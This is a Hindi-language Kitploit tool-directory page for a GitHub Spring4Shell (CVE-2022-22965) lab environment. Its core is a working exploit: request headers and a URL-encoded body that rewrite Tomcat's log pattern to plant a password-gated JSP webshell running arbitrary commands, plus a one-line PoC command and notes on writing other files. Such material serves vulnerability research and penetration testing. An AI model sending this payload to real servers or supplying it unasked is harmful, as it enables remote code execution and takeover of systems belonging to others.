Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Spring4Shell — CVE-2022-22965 के लिए स्प्रिंग आरसीई वातावरण | Kitploit
उपकरण/GitHubGitHub/dbgee/spring4shell
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubdbgee/spring4shell

Spring4Shell

CVE-2022-22965 के लिए स्प्रिंग आरसीई वातावरण

रिपॉजिटरी देखें
123 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Spring RCE CVE-2022-22965

भेद्यता वातावरण

पर्यावरण जानकारी

  • springboot
  • jdk11
  • tomcat9.0.30

payload

अनुरोध हेडर कॉन्फ़िगरेशन

"suffix": "%>//",
"c1": "Runtime",
"c2": "<%",
"DNT": "1",
"Content-Type": "application/x-www-form-urlencoded",

अनुरोध बॉडी डेटा

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=myshell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

उपरोक्त सामग्री भेजने पर, लक्ष्य सिस्टम पर सफलतापूर्वक एक वेबशेल लिखा जा सकता है, आमतौर पर webapps\ROOT\myshell.jsp पथ पर।

यदि पथ नियंत्रित किया जा सकता है, तो payload को बदलकर आप कोई भी आवश्यक फ़ाइल लिख सकते हैं।
मुख्य रूप से Tomcat लॉग प्रारूप को संशोधित करके, लॉग के रूप में शेल लिखा जाता है।

poc उपयोग

आसान पुनरुत्पादन के लिए, सीधे नीचे दिए गए poc का उपयोग करें।

python3 poc.py http://test.com/hello
टूल डाउनलोड करें